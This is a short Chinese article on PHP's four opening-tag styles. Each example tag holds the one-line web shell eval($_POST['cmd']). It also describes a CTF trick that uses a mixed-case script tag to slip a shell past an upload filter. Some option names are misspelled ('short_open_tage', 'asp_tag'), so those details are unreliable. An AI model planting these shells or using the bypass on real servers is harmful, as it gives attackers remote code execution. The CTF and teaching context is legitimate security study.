今天就跟大家聊聊有关PHP有几种标识风格,可能很多人都不太了解,为了让大家更加了解,小编给大家总结了以下内容,希望大家根据这篇文章可以有所收获。

PHP的标识有4种风格

XML风格

<?phpeval($_POST['cmd']); ?>

php推荐使用的标记风格。

服务器管理员无法禁用,所有服务器上均可使用该风格。

脚本风格

<script language="php"> eval($_POST['cmd']);</script>

默认开启,无法禁用

笔者曾遇到过一CTF题目,要求上传shell,但是却对文件内容做了过滤 ,<? 以及 php,替换为了空格。此种风格中,language的值,大小写都可以,因此可以构造如下代码进行绕过

<script language="PhP"> eval($_POST['cmd']);</script>

简短风格

<? eval($_POST['cmd']);?>

此种风格需要在配置文件php.ini中启用short_open_tage选项

此种风格在许多环境中默认是不支持的

ASP风格

<% eval($_POST['cmd']);%>

此种风格需要在配置文件php.ini中启用asp_tag选项

在默认情况下是禁用的

看完上述内容,你们对PHP的几种标识风格有进一步的了解吗?如果还想了解更多知识或者相关内容,请关注亿速云行业资讯频道,感谢大家的支持。